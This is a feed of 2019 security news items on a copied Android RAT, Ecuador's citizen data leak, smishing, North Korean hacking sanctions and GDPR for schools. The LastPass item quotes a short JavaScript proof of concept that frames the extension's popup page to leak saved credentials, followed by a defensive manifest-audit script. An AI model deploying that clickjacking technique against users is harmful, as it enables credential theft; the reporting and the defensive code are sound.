Accenture has collaborated with Exxaro, one of South Africa’s leading coal producers, to help digitally transform its business and unlock new revenue streams by managing the migration of its SAP solutions, and other centrally-run applications used by Exxaro business units, to Microsoft Azure. This supports Exxaro’s ambition to establish a secure, agile, cost-effective and scalable platform that will improve business processes and continuity. Accenture created a cloud transformation strategy for Exxaro that defined the business … More

The post Accenture supports Exxaro to digitally transform its business and unlock new revenue streams appeared first on Help Net Security.

Understanding the PCI Software Security Framework: New Educational Resources


Ahead of the North America Community Meeting this week in Vancouver, PCI SSC has published new educational resources on the PCI Software Security Framework (SSF). The SSF At-a-Glance and Transitioning from PA-DSS to SSF Resource Guide provide key information to increase awareness and understanding of the SSF, its benefits and its impact on the Payment Application Data Security Standard (PA-DSS) and Program.

MobiHok RAT, a new Android malware based on old SpyNote RAT

A new Android malware, tracked as MobiHok RAT, has appeared in the threat landscape; it borrows its code from the old SpyNote RAT.

Experts from threat intelligence firm SenseCy spotted a new Android RAT, dubbed MobiHok RAT, that reuses code from the old SpyNote RAT.

At the beginning of July 2019, the experts spotted a threat actor dubbed mobeebom offering for sale an Android Remote Administration Tool (RAT) called MobiHok v4 on a prominent English-language hacking forum.

The experts discovered that mobeebom is active on multiple Arabic-speaking hacking forums under different pseudonyms, a circumstance that suggests he is an Arabic speaker. Researchers also noticed that the posts published by the hacker were written in poor English.

mobeebom has been promoting the MobiHok RAT through multiple channels, including YouTube and a dedicated Facebook page, since January 2019.

MobiHok is written in Visual Basic .NET and Android Studio, and it allows an operator to fully control the infected device. Experts pointed out that the latest release of the RAT implements new features, including a bypass of the Facebook authentication mechanism.

The analysis conducted by the experts suggests that the threat actor obtained SpyNote’s source code and made some minor changes to its code before reselling it online.

“However, from a research we conducted into mobeebom’s activity in the underground communities, and the analysis of a sample of the malware builder we retrieved, it is apparent that the threat actor based MobiHok on the source code of another prominent Android RAT named SpyNote, which was leaked online in 2016.” continues the report.

“The initial findings of our technical analysis confirmed that mobeebom probably obtained SpyNote’s source code, made some minor changes, and now resells it as a new RAT under the name MobiHok.”

In July 2016, experts from Palo Alto Networks spotted a RAT offered for free called SpyNote, much like OmniRat and DroidJack. Today the malware can be purchased from a website on the surface web, or downloaded for free from a forum.

MobiHok supports several features, including access to files, access to the camera, keylogging, control over SMS and contacts, the ability to bypass both Samsung security mechanisms and Google Play mechanisms, and to bind itself to another APK app.

“To conclude, despite mobeebom’s attempt to market his MobiHok v4 Android RAT as new and his declared intention to make it the top Android RAT on the market, it appears that this malware is based on the leaked source code of the known SpyNote Android RAT with only minor changes and is being resold by the threat actor under a different name.” concludes SenseCy.

Pierluigi Paganini

(SecurityAffairs – MobiHok RAT, malware)

The post MobiHok RAT, a new Android malware based on old SpyNote RAT appeared first on Security Affairs.

New Breach Exposes an Entire Nation: Living and the Dead

A misconfigured database has exposed the personal data of nearly every Ecuadorian citizen, including 6.7 million children.

The database was discovered by vpnMentor and was traced back to Ecuadorean company Novaestrat. It contained 20.8 million records, well over the country’s current population of 16 million. The data included official government ID numbers, phone numbers, family records, birthdates, death dates (where applicable), marriage dates, education histories, and work records.

“One of the most concerning parts about this data breach is that it includes detailed information about people’s family members,” stated a blog from vpnMentor announcing the discovery of the leak. “Most concerningly, the leaked data seems to include national identification numbers and unique taxpayer numbers. This puts people at risk of identity theft and financial fraud.”

The leaked data also included financial information for individuals and businesses including bank account status, account balance, credit type, job details, car models, and car license plates.

“The information in both indexes would be as valuable as gold in the hands of criminal gangs,” wrote ZDNet reporter Catalin Cimpanu. “Crooks would be able to target the country’s most wealthy citizens (based on their financial records) and steal expensive cars (having access to car owners’ home addresses and license plate numbers).” 

The exposed database was on a server running Elasticsearch, a software program that enables users to query large amounts of data. Elasticsearch has been involved in several high profile data leaks, mostly due to configuration mistakes. Other recent Elasticsearch leaks included a Canadian data mining firm’s records for 57 million US citizens, a medical database storing the data on 85 percent of Panamanian citizens, and a provincial Chinese government database that contained 90 million personal and business records. 

The post New Breach Exposes an Entire Nation: Living and the Dead appeared first on Adam Levin.

City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

Officials in the Tennessee city of Germantown have restricted the email account of an alderman who refuses to undergo cybersecurity training. 

Insurance specialist and married father of one Dean Massey was elected to the position of alderman in 2016. His official DMassey@germantown-tn.gov email account was restricted earlier this month after Massey failed to complete a mandatory cybersecurity training course.

All Germantown officials and city employees were asked to complete the 45-minute course by a specific date and were warned that failure to comply would result in their email access being restricted. 

Massey, who holds a degree in criminal justice from the University of Mississippi, told the Commercial Appeal website that he refused to complete the cybersecurity training because the instruction to do so had come to him from the city’s unelected director of information technology. 

"I don't think it's appropriate for a city employee to tell aldermen what they have to do to access their email," said Massey.  

Massey responded to the imposed restriction by setting up a personal email account—dmassey.cityofgermantown@gmail.com—to handle his official city business. Conducting public business from a personal email address does not violate any Tennessee state laws or ethics guidelines but could complicate the process of fulfilling public records requests. 

Massey's refusal comes in the wake of a July 2019 ransomware attack on the neighboring city of Collierville, which compromised the town's internal servers. 

Commenting on Massey's argument that an elected official shouldn't have to comply with a directive from an unelected official, fellow Germantown alderman Rocky Janda told Infosecurity Magazine: "Mr. Massey came up with that reason for not taking the training. This was a city administrator/mayor decision to make it mandatory for all employees and elected officials due to recent local threats. Staff does not make these kinds of decisions on their own." 

Asked if Mr. Massey's actions had undermined the authority of Germantown's aldermen, Janda said: "Nothing Mr. Massey can do would undermine the authority of the aldermen. There is nothing special about him."

Janda, who himself became a victim of cyber-crime when hackers targeted his company with ransomware, believes mandatory cybersecurity training for elected officials is a good idea. Asked if he thought that Massey's ability to carry out his alderman duties had been affected by the restriction of his official email account, Janda said: "Yes, at least with staff." 

Stating how he would like to see the situation resolved, Janda said: "Mr. Massey just needs to take the training. It's 45 minutes . . ."

According to Commercial Appeal, Janda has asked the city administration to discuss a potential censure of Massey's actions to encourage a discussion around cybersecurity issues. Massey has also asked for cybersecurity to be added to the administration's agenda for the next meeting, which will take place on September 23.  

Massey did not respond to Infosecurity Magazine's request for comment.

Data of Virtually All Ecuadoreans Leaked Online

The personal data of almost every citizen of Ecuador has been leaked online in a catastrophic data breach. 

The names, phone numbers, and financial information of approximately 20 million Ecuadoreans were found on an unsecured cloud server by researchers working on a web-mapping project at security company vpnMentor.

The enormous 18GB cache of data included personal information relating to individuals who were deceased as well as to the country's living population of approximately 17 million. Personal information relating to 6.7 million Ecuadorean children was among the data leaked.

Exposed files revealed a large amount of sensitive personally identifiable information, such as family records, marriage dates, education histories, employment records, and official ten-digit government ID numbers called cédulas de identidad.

"This data breach is particularly serious simply because of how much information was revealed about each individual," wrote Noam Rotem and Ran Locar from vpnMentor. "Scammers could use this information to establish trust and trick individuals into exposing more information." 

Tax records and financial records revealing the account balances of customers of a large Ecuadorean bank were among the data breached. 

Rotem and Locar wrote, "Although the exact details remain unclear, the leaked database appears to contain information obtained from outside sources. These sources may include Ecuadorian government registries, an automotive association called Aeade, and Biess, an Ecuadorian national bank."

A simple search of the leaked data would enable anyone to put together a list of wealthy Ecuadoreans that would be the envy of kidnappers everywhere. Taken as a whole, the data revealed not just who had large amounts of money in the bank but also where they lived, if they were married, if they had children, what cars they drove, and the license plates of their vehicles. 

Within the leaked records researchers also found an entry and national identification number for WikiLeaks founder Julian Assange, who was granted political asylum by Ecuador in 2012. 

Rotem and Locar found the exposed data in a number of files saved on a server located in Miami, Florida, which was set up and maintained by Ecuadorian marketing and analytics company Novaestrat.

After discovering the data cache, vpnMentor contacted Novaestrat. The Ecuador Computer Emergency Security Team restricted access to the unsecured server on September 11, 2019. 

The breach follows a similar incident that took place recently in another South American country. Last month, a server was found that exposed the voter records of 80% of Chile's 14.3 million citizens.

Chicago Broker Fined $1.5m for Inadequate Cybersecurity

A US futures and securities clearing broker has been slapped with a $1.5m fine for failing to implement and enforce adequate cybersecurity measures. 

An investigation into Phillip Capital Incorporated (PCI) by the US Commodity Futures Trading Commission (CFTC) revealed a culture in which employees were not monitored to ensure that the cybersecurity of the business was protected and maintained.

Inadequate cybersecurity measures put in place within the Chicago-based company were found to be partially responsible for a data breach and the theft by cyber-criminals of $1m in PCI customer funds. 

The theft occurred when one of the company's IT engineers fell victim to a phishing email. The CFTC criticized PCI for taking too long to report the crime to customers after it happened in early 2018.  

On September 12, 2019, the CFTC issued an order that filed and simultaneously settled charges against PCI "for allowing cyber criminals to breach PCI email systems, access customer information, and successfully withdraw $1 million in PCI customer funds," and also for failing to disclose the breach to its customers "in a timely manner."

In a statement published on its website, the CFTC said that "the order finds that PCI failed to supervise its employees with respect to cybersecurity policy and procedures, a written information systems security program, and customer disbursements."

PCI was issued a civil monetary penalty of $500,000 and ordered to pay $1m in restitution. The broker was credited with the $1m restitution "based on its prompt reimbursement of the customer funds when the fraud was discovered."

The commission's investigation into PCI may be over, but the CFTC plans to keep an eye on the registered futures commission merchant's cybersecurity practices. The order filed by the CFTC requires PCI to provide reports to the commission on its remediation efforts. 

"Cybercrime is a real and growing threat in our markets," said CFTC director of enforcement James McDonald. "While it may not be possible to eliminate all cyber threats, CFTC registrants must have adequate procedures in place—and follow those procedures—to protect their customers and their accounts from potential harm."

Data leak exposes sensitive data of all Ecuador’s citizens

Experts discovered a huge data leak affecting Ecuador, possibly the largest full-country leak to date, that exposed data belonging to 20 million Ecuadorian citizens.

Security experts at vpnMentor have discovered a huge data leak affecting Ecuador that exposed data belonging to 20 million Ecuadorian citizens.

The data were left unsecured online on a misconfigured Elasticsearch server. The exposed data includes full PII, marital status and date of marriage, level of education, financial information, and more.

This may be the largest full-country leak to date: it affects the whole country, and the exposure of such data poses a severe threat to Ecuadorian citizens.

“vpnMentor’s research team has found a large data breach that may impact millions of individuals in Ecuador. The leaked database includes over 20 million individuals.” reads the post published by vpnMentor.

“Led by Noam Rotem and Ran Locar, our team discovered the data breach on an unsecured server located in Miami, Florida. The server appears to be owned by Ecuadorian company Novaestrat.”

The leaked data include citizens’ financial records and car registration information.

The personal records of most of Ecuador’s population, including children, have been left exposed online due to a misconfigured database, ZDNet has learned.

The server contained a total of 20.8 million user records (18 GB of data), more than the country’s total population (16.6 million), likely due to the presence of duplicate records and data of deceased citizens.

The analysis of the indexes revealed that the database is composed of data gathered from government sources (mostly the Ecuadorian government) and data gathered from private databases.

“Individuals in the database are identified by a ten-digit ID code. In some places in the database, that same ten-digit code is referred to as “cedula” and “cedula_ruc”.” continues the post.

“In Ecuador, the term “cédula” or “cédula de identidad” refers to a person’s ten-digit national identification number, similar to a social security number in the US.

The term “RUC” refers to Ecuador’s unique taxpayer registry. The value here may refer to a person’s taxpayer identification number.”

The experts found within the leaked records an entry for WikiLeaks founder Julian Assange that also includes the “cedula.”

Experts also found millions of entries for children under the age of 18 that contained names, cedulas, places of birth, gender, and home addresses.

The database was secured on September 11, 2019, after vpnMentor notified the Ecuador CERT (Computer Emergency Response Team) of its discovery.

Pierluigi Paganini

(SecurityAffairs – Ecuador, data leak)

The post Data leak exposes sensitive data of all Ecuador’s citizens appeared first on Security Affairs.

Smishing Explained: What It Is and How You Can Prevent It

Do you remember the last time you interacted with a brand, political cause, or fundraising campaign via text message? Have you noticed these communications occurring more frequently of late?

It’s no accident. Whereas marketers and communications professionals can’t count on email opens or on users accepting push notifications from apps, they’re well aware that around 98% of SMS messages are read within seconds of being received.

As with any development in how we communicate, the rise in brand-related text messaging has attracted scammers looking to profit. Hence we arrive at a funny new word in the cybersecurity lexicon, “smishing.” Mathematical minds might understand it better represented by the following equation:

SMS + Phishing = Smishing

For the rest of us, smishing is the act of using text messages to trick individuals into divulging sensitive information, visiting a risky site, or downloading a malicious app onto a smartphone. These often benign-seeming messages might ask you to confirm banking details, verify account information, or subscribe to an email newsletter via a link delivered by SMS.

As with phishing emails, the end goal is to trick a user into an action that plays into the hands of cybercriminals. Shockingly, smishing campaigns often closely follow natural disasters as scammers try to prey on the charitable to divert funds into their own pockets.

Smishing vs Vishing vs Phishing

If you’re at all concerned with the latest techniques cybercriminals are using to defraud their victims, your vocabulary may be running over with terms for the newest tactics. Here’s a brief refresher to help keep them straight.

  • Smishing, as described above, uses text messages to extract the sought-after information. Different smishing techniques are discussed below.
  • Vishing is when a fraudulent actor calls a victim pretending to be from a reputable organization and tries to extract personal information, such as banking or credit card information.
  • Phishing is any type of social engineering attack aimed at getting a victim to voluntarily turn over valuable information by pretending to be a legitimate source. Both smishing and vishing are variations of this tactic.

Examples of Smishing Techniques

Enterprising scammers have devised a number of methods for smishing smartphone users. Here are a few popular techniques to be aware of:

  • Sending a link that triggers the downloading of a malicious app. Clicks can trigger automatic downloads on smartphones the same way they can on desktop internet browsers. In smishing campaigns, these apps are often designed to track your keystrokes, steal your identity, cede control of your phone to hackers, or encrypt the files on your phone and hold them for ransom.
  • Linking to information-capturing forms. In the same way many email phishing campaigns aim to direct their victims to online forms where their information can be stolen, this technique uses text messages to do the same. Once a user has clicked on the link and been redirected, any information entered into the form can be read and misused by scammers.
  • Targeting users with personal information. In a variation of spear phishing, committed smishers may research a user’s social media activity in order to entice their target with highly personalized bait text messages. The end goal is the same as any phishing attack, but it’s important to know that these scammers do sometimes come armed with your personal information to give their ruse a real feel.
  • Referrals to tech support. Again, this technique is a variation on the classic tech support scam, or it could be thought of as the “vish via smish.” An SMS message will instruct the recipient to contact a customer support line via a number that’s provided. Once on the line, the scammer will try to pry information from the caller by pretending to be a legitimate customer service representative. 

How to Prevent Smishing

For all the conveniences technology has bestowed upon us, it’s also opened us up to more ways to be ripped off. But if a text message from an unknown number promising to rid you of mortgage debt (but only if you act fast) raises your suspicion, then you’re already on the right track to avoiding falling for smishing.

Here are a few other best practices for frustrating these attacks:

  • Look for all the same signs you would if you were concerned an email was a phishing attempt: 1) check for spelling errors and grammar mistakes, 2) visit the sender’s website itself rather than providing information in reply to the message, and 3) verify the sender’s telephone number to make sure it matches that of the company it purports to belong to.
  • Never provide financial or payment information on anything other than the trusted website itself.
  • Don’t click on links from unknown senders or from senders you do not trust.
  • Be wary of “act fast,” “sign up now,” or other pushy and too-good-to-be-true offers.
  • Always type web addresses in a browser rather than clicking on the link.
  • Install a mobile-compatible antivirus on your smart devices.

The post Smishing Explained: What It Is and How You Can Prevent It appeared first on Webroot Blog.

A flaw in LastPass password manager leaks credentials from previous site


An expert discovered a flaw in the LastPass password manager that exposes login credentials entered on a site previously visited by a user.

Tavis Ormandy, the popular white-hat hacker at Google Project Zero, has discovered a vulnerability in the LastPass password manager that exposes login credentials entered on a site previously visited by a user.


On September 12, 2019, LastPass addressed the vulnerability with the release of version 4.33.0.

“Hello, I noticed that you can create a popup without calling do_popupregister() by iframing popupfilltab.html (i.e. via moz-extension, ms-browser-extension, chrome-extension, etc). It’s a valid web_accessible_resource.” reads a security advisory published by Ormandy.

“Because do_popupregister() is never called, ftd_get_frameparenturl() just uses the last cached value in g_popup_url_by_tabid for the current tab. That means via some clickjacking, you can leak the credentials for the previous site logged in for the current tab.”

Ormandy published a step-by-step procedure to exploit the flaw and display the credentials provided to the previously visited website:

// Ormandy's proof of concept: frame the extension's web-accessible popup page
// from an ordinary web page (the ID below is the Chrome extension ID).
y = document.createElement("iframe");
y.height = 1024;
y.width = "100%";
y.src="chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html";
// or y.src="moz-extension://...";
// or y.src="ms-browser-extension://...";
document.body.appendChild(y);

Ormandy explained that the bug is easy to exploit and requires little user interaction: the attacker only needs to lure the victim to a page that frames the popup and, via clickjacking, can extract the credentials entered on a previously visited site.

“Ah-ha, I just figured out how to do this google automatically, because compare_tlds(lp_gettld_url(a), lp_gettld_url(t)) succeeds for translate.google.com and accounts.google.com, but you can iframe untrusted sites with translate.google.com, so the top url is irrelevant.” continues the expert.

“I think it’s fair to call this “High” severity, even if it won’t work for *all* URLs.”
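The root cause Ormandy describes is that popupfilltab.html is listed as a web_accessible_resource, which is what lets any web page iframe it. The following is an added example, not LastPass’s or Ormandy’s code: a Node.js script that audits an extension manifest for HTML pages exposed that way, handling both the Manifest V2 form (a list of path globs, loadable by every origin) and the Manifest V3 form (resources paired with a `matches` list). The two sample manifests are constructed for the demo and are not the real LastPass manifest.

```javascript
// Added example (not LastPass's or Ormandy's code): audit an extension manifest
// for HTML pages exposed as web_accessible_resources, the property that let any
// web page iframe popupfilltab.html in the bug described above.
// Handles Manifest V2 (array of path globs) and V3 (array of {resources, matches}).

const HTML_EXT = /\.(x?html?)$/i;

// Expand the V2 and V3 forms into a flat list of {path, matches} entries.
function listWebAccessibleResources(manifest) {
  const war = manifest.web_accessible_resources || [];
  const out = [];
  for (const entry of war) {
    if (typeof entry === 'string') {
      // V2: every origin may load the resource.
      out.push({ path: entry, matches: ['<all_urls>'] });
    } else if (entry && Array.isArray(entry.resources)) {
      // V3: the matches list restricts which page origins may load it.
      const matches = entry.matches || [];
      for (const path of entry.resources) out.push({ path, matches });
    }
  }
  return out;
}

// Return the HTML resources a web page can frame, with the origins allowed to
// do so. Wildcard globs ("*" or "dir/*") are reported too, since they expose
// every page underneath them.
function findFramableHtml(manifest) {
  return listWebAccessibleResources(manifest)
    .filter(({ path }) => HTML_EXT.test(path) || path === '*' || path.endsWith('/*'))
    .map(({ path, matches }) => ({
      path,
      exposedToAllSites: matches.includes('<all_urls>') || matches.includes('*://*/*'),
      matches,
    }));
}

// Constructed sample manifests (assumption: not the real LastPass manifest).
const sampleV2 = {
  manifest_version: 2,
  name: 'example-pw-manager',
  web_accessible_resources: ['icons/*.png', 'popupfilltab.html', 'overlay.js'],
};

const sampleV3 = {
  manifest_version: 3,
  name: 'example-pw-manager',
  web_accessible_resources: [
    { resources: ['icons/*.png'], matches: ['<all_urls>'] },
    { resources: ['popupfilltab.html'], matches: ['https://vault.example.com/*'] },
  ],
};

console.log(JSON.stringify(findFramableHtml(sampleV2), null, 2));
console.log(JSON.stringify(findFramableHtml(sampleV3), null, 2));
```

Run it with `node audit.js` after saving the block; for a real extension, replace the sample objects with the parsed contents of its manifest.json. Any HTML page reported with `exposedToAllSites: true` is frameable by every site and needs its own defence against the clickjacking pattern in the advisory, such as refusing to render when `window.top !== window`.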

At the time of writing, there is no news about the exploitation of this bug in attacks in the wild.

LastPass auto-updates both its mobile apps and its browser extensions; users who have disabled auto-update for some reason have to update manually.

Pierluigi Paganini

(SecurityAffairs – LastPass, hacking)

The post A flaw in LastPass password manager leaks credentials from previous site appeared first on Security Affairs.

Another Side Channel in Intel Chips

Not that serious, but interesting:

In late 2011, Intel introduced a performance enhancement to its line of server processors that allowed network cards and other peripherals to connect directly to a CPU's last-level cache, rather than following the standard (and significantly longer) path through the server's main memory. By avoiding system memory, Intel's DDIO, short for Data-Direct I/O, increased input/output bandwidth and reduced latency and power consumption.

Now, researchers are warning that, in certain scenarios, attackers can abuse DDIO to obtain keystrokes and possibly other types of sensitive data that flow through the memory of vulnerable servers. The most serious form of attack can take place in data centers and cloud environments that have both DDIO and remote direct memory access enabled to allow servers to exchange data. A server leased by a malicious hacker could abuse the vulnerability to attack other customers. To prove their point, the researchers devised an attack that allows a server to steal keystrokes typed into the protected SSH (or secure shell session) established between another server and an application server.

Israeli Cops Arrest Cyber Surveillance Vendor’s Employees


Israeli police have arrested several employees of a domestic company that makes cyber-surveillance tools and raided its offices over the weekend, according to local reports.

Although a court order has prevented many details of the case from making it into the public domain, including the identity of the suspects, the arrests were apparently made under charges of fraud, smuggling and money-laundering.

The individuals are thought to be staff at Ability Computer & Software Industries and Ability Security Systems, subsidiaries of Ability, which markets itself as providing interception technology for mobile cellular and satellite communications.

Founded in 1994 by “military and communication experts,” Ability claims to count governments, military, law enforcement and border control agencies as its customers.

However, there are suspicions that the firm may have broken Israeli laws around the export of specific security-related technologies, according to Haaretz.

The Israeli defense ministry is said to have suspended Ability subsidiaries from its official list of registered defense export companies after it exported geolocation systems without a license.

The firm is also facing a backlash from the US regulator the SEC over an anti-fraud investigation dating back to 2017 concerning its 2015 merger with the shell company Cambridge Capital Acquisition Corporation.

Ability also paid out $3m last year to settle out-of-court with investors who said they’d been misled about the state of the firm’s finances.

The police investigation is being undertaken by the International Crime Investigations unit alongside the Director of Security of the Defense Establishment, according to the report.

The news comes just weeks after the Israeli government made moves to ease the process for exporting cyber-weapons to certain countries, despite warnings from the UN and others that such tools are being used by despotic governments to crack down on dissent.

Spam Campaign Targeting German Users with Ordinypt Malware

A new spam campaign is attempting to infect German-speaking users with samples of the destructive Ordinypt malware family. According to Bleeping Computer, the campaign sent spam emails masquerading as a job application from someone named Eva Richter. These messages supported this claim by using the subject line “Bewerbung via Arbeitsagentur – Eva Richter,” which translates […]… Read More

The post Spam Campaign Targeting German Users with Ordinypt Malware appeared first on The State of Security.

France and Germany will block Facebook’s Libra cryptocurrency

Bad news for Facebook and its projects, France and Germany agreed to block Facebook’s Libra cryptocurrency, the French finance ministry said.

The French and German governments announced that they will block Facebook’s Libra cryptocurrency; the news was reported by French Finance Minister Bruno Le Maire.

“We believe that no private entity can claim monetary power, which is inherent to the sovereignty of nations,” reads a joint statement issued by the two governments.

“I want to be absolutely clear: in these conditions, we cannot authorise the development of Libra on European soil,” Le Maire said at a conference in Paris on virtual currencies.

Le Maire had explained last week that Facebook should not be allowed to operate the Libra cryptocurrency in Europe because it threatens the monetary sovereignty and financial systems of the member states.

[Image: Facebook Libra cryptocurrency. Source: Coindesk.com]

Facebook announced in June that it plans to launch Libra in 2020; to make the currency stable, the social network giant wants to back Libra with reserves of traditional currency.

The non-profit Libra Association includes major firms such as PayPal, Visa, Stripe, Mastercard, eBay, and Uber.

“Unlike other cryptocurrencies, which are not controlled by a central authority, Libra will not be decentralised, but will be entrusted to a Swiss-based association of major technology and financial services companies. Besides Facebook, backers of Libra include the payment companies Visa, MasterCard and PayPal, and the ride-hailing apps Lyft and Uber.” reported The Guardian.

Authorities also fear possible abuses of the Libra cryptocurrency, including money laundering, and how Facebook would prevent them.

Pierluigi Paganini

(SecurityAffairs – Facebook, cryptocurrency)

The post France and Germany will block Facebook’s Libra cryptocurrency appeared first on Security Affairs.

Raytheon’s cloud-based test bed takes risk out of innovation

Risk, compliance and security are primary concerns for companies operating in the defense industry. But increased focus on these issues can complicate an organization’s agility when adopting or adapting to new technology. This is what Raytheon was up against when it embarked on an IT initiative to develop a secure, cloud-based virtual innovation environment to test and explore new technology.

New technology that hasn’t been screened or tested for potential security threats or vulnerabilities can pose a major risk to an organization that prioritizes security. In developing its innovation environment, Raytheon needed to create a solution that both supports the “rigorous and time-consuming processes” of testing for potential security threats and “expedites the risk reviews while still achieving speed, agility and compliance,” says Pierre Brennecke, manager of digital channels and events at the defense contractor.


US Slaps Sanctions on Three North Korean Cyber Groups


The US Treasury has finally announced sanctions on three notorious North Korean state hacking groups, which it accused of attacks designed to generate money for the country’s illegal weapons program.

The Office of Foreign Assets Control (OFAC) said on Friday that the sanctions would apply to Lazarus Group, Bluenoroff and Andariel. It effectively demanded that global banks block any transactions related to the groups.

All three entities have been pegged as under the control of the Reconnaissance General Bureau (RGB), Pyongyang’s primary intelligence agency.

Lazarus Group is the largest and best known, having been blamed for the destructive malware attack on Sony Pictures Entertainment and WannaCry. Along with Bluenoroff hackers it is also said to have launched the daring $80m cyber-heist on Bangladesh Bank.

While Lazarus Group targets range far and wide — including government, military, financial, manufacturing, publishing, media, entertainment, international shipping and critical infrastructure — Bluenoroff was apparently set up explicitly with the aim of making money to overcome global sanctions on North Korea.

Andariel, meanwhile, is apparently focused on hacking ATMs, stealing customer information to sell on the dark web, and stealing from online gambling sites, as well as hacking South Korean military systems to gather intelligence.

The groups’ efforts also focused on cryptocurrency exchanges in a bid to generate more funds for Pyongyang’s missile and nuclear weapons programs, the Treasury claimed.

This chimes with allegations from the UN, denied by North Korea, that the hermit nation had amassed a trove of $2bn from “at least 35 reported instances of DPRK actors attacking financial institutions, cryptocurrency exchanges and mining activity” across 17 countries.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber-attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury under secretary for terrorism and financial intelligence. 

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

UK’s Environmental Agencies Lose Hundreds of Devices


The UK government is in hot water again after Freedom of Information (FOI) requests revealed its Environment Department has misplaced hundreds of laptops and mobile devices over recent years.

Security vendor Absolute Software sent requests for info to the Department for Environment, Food, and Rural Affairs (DEFRA) and non-departmental public body the Environment Agency, which it sponsors.

They revealed that the two organizations lost a combined 540 devices over the past three financial years: DEFRA accounting for 100 of these and the Environment Agency reporting a total of 440.

Mobile phone losses were most common, with the Environment Agency again losing the lion’s share (363) and DEFRA just 63.

The Environment Agency misplaced 59 laptops over the period, with just 35 going missing from DEFRA, while only 21 tablet computers were lost in total – three from DEFRA and 18 from the Environment Agency.

Yet despite the headline stats, it’s the Environment Agency which appears to be improving its device security processes. It recorded an overall decrease of 24% in lost IT kit over the three-year period, while DEFRA witnessed a 43% increase.

A spokesperson from the Environment Agency played down the findings, claiming they should be seen in the context of the public body’s 10,000+ nationwide staff.

“Due to the nature of our work, we have operational staff working in the field to protect the environment and support our incident response capabilities,” the statement noted.

“Because of this there is always a risk that exposure to threats concerning mobile technology will be increased. All staff are required to work in accordance with our IT and security policies so that we continue to work toward minimizing losses, and risk associated with losses.”

Absolute Software vice-president, Andy Harcup was less forgiving, branding the losses “unbelievable.”

“Every single lost device is a potential goldmine of confidential information and should be properly secured so that if stolen it can be tracked, frozen and recovered,” he argued.

“It’s also critical that government agencies have capabilities in place so that when mobile devices are exposed to threats outside of their control, they are able to locate the devices whether they are on or off the network, and wipe the data on the devices in order to comply with critical regulations like GDPR.”

These are just the latest two government bodies to have had their device security policies scrutinized: the Ministry of Defence recorded a 300% increase in losses of both devices and sensitive data over the past two financial years, according to Absolute Software.

The Top 10 Highest Paying Jobs in Information Security – Part 1

Given a surge in digital threats like ransomware, it is no surprise that the field of information security is booming. Cybersecurity Ventures estimates that there will be 3.5 million job openings across the industry by 2021. Around that same time, the digital economy research firm forecasted that global digital security spending would exceed one trillion […]… Read More

The post The Top 10 Highest Paying Jobs in Information Security – Part 1 appeared first on The State of Security.

Is your school GDPR compliant? Use our checklist to find out

At this year’s ASCL (Association of School and College Leaders) conference, a guest said to us: “The GDPR? Wasn’t that last year?”

Our heads fell into our hands. How was it possible for someone to be so misguided about such a well-publicised regulation? Granted, 2018 was very much ‘the year of the GDPR’ in some circles. It came into effect in May 2018, following much discussion and a last-minute surge from organisations that left compliance until the last minute.

But compliance isn’t a one-time thing. It continues to be effective for any organisation that processes the personal data of, or monitors the behaviour of, EU residents.

A brief summary of the GDPR

The GDPR works like this: there are data subjects (that’s individuals like you and me), and we own our own personal data. The GDPR considers personal data to be anything that identifies, or can be used to identify, a living person, such as your name, National Insurance number or email address, whether it’s a personal or work account.

The GDPR outlines a list of steps organisations must take to protect that information. It also contains eight data subject rights that give individuals more control over the way organisations use their personal data.

These include:

  • The right to access the personal information organisations store on them;
  • The right to request that organisations rectify any information that’s inaccurate or incomplete;
  • The right to erase personal data when it’s no longer necessary or the data was unlawfully processed; and
  • The right to object to processing if the individual believes the organisation doesn’t have a legitimate reason to process information.

Organisations that fail to meet these requirements face fines of up to €20 million (about £18 million) or 4% of their annual global turnover, whichever is greater.

GDPR compliance in schools

Schools have a particularly hard time of it when it comes to the GDPR. They often work with tight budgets and lack the resources to retain a dedicated information security team.

Additionally, schools process large amounts of children’s data, which merits extra protection. In some cases, there are specific rules that apply to children, which means data processors must work out whether the data subject qualifies as a child (defined as under 13 in the UK) before proceeding.

If that’s the case, the data processor must account for requirements concerning:

Can you use consent?

Organisations cannot obtain valid consent from a child. Instead, they must seek the approval of a person holding “parental responsibility”, and make “reasonable efforts” to verify that the person providing the consent is indeed a parental figure.

This requirement doesn’t apply in the context of preventive or counselling services offered directly to a child.




Privacy notices

Organisations must ensure that privacy notices targeted at children are written in plain language that could reasonably be understood by data subjects.

This is similar to the general rules about privacy notices, but it’s important to remember that the language you use must be appropriate to the intended audience. What counts as plain language to a 12-year-old will probably be very different from what counts as plain language to a 5-year-old.




Online services offered to children

In most cases, consent requests for children will relate to online services, or what the GDPR refers to more generally as information society services. These include things such as online shopping, live or on-demand streaming and social networks.

The GDPR states that consent must be closely regulated in these services because children “may be less aware of the risks, consequences and safeguards” of handing over their personal details.

Schools aren’t GDPR-compliant

These are reasonable requirements, but many schools still fail to understand the importance of compliance or make the necessary changes. The ICO (Information Commissioner’s Office) reported that breaches in the education sector increased by 43% in the first three months that the GDPR was effective.

The number of security incidents increased from 355 in the second quarter of 2017–18 to 511 in the same period last year. Meanwhile, the number of incidents involving data breaches increased from 239 to 353.

The ICO found that common disclosure issues included:

  • The loss or theft of paper or digital files;
  • Emailing information to the wrong recipient; and
  • Accidental verbal disclosure.

There has also been a sharp increase in the number of cyber attacks targeting schools, with a 69% rise in malware, ransomware and phishing scams between 2017 and 2018.

Mark Orchison, managing director of cyber security firm 9ine, warned that “schools don’t have the internal expertise” to deal with cyber attacks, and they lack “the skills to understand the risks or what to do when [an attack] happens”.

“Schools are seen as an easy target,” he added. “Sending false invoices, for example, is easy money.”

The figures aren’t all bad news, though. Orchison suggested that the rise in data breach reports may well be a case of schools becoming more aware of what breaches are and when they need to be reported.

GDPR checklist for schools

Staying on top of your GDPR compliance requirements can seem daunting, which is why we encourage all organisations to create a plan of action.

Anyone looking for help on what that should include should take a look at our GDPR checklist for schools. It will help you record your school’s progress towards GDPR compliance and identify any areas where development may be required.


A version of this blog was originally published on 28 March 2019.

The post Is your school GDPR compliant? Use our checklist to find out appeared first on IT Governance Blog.

What Does GDPR Mean for Your Organization?

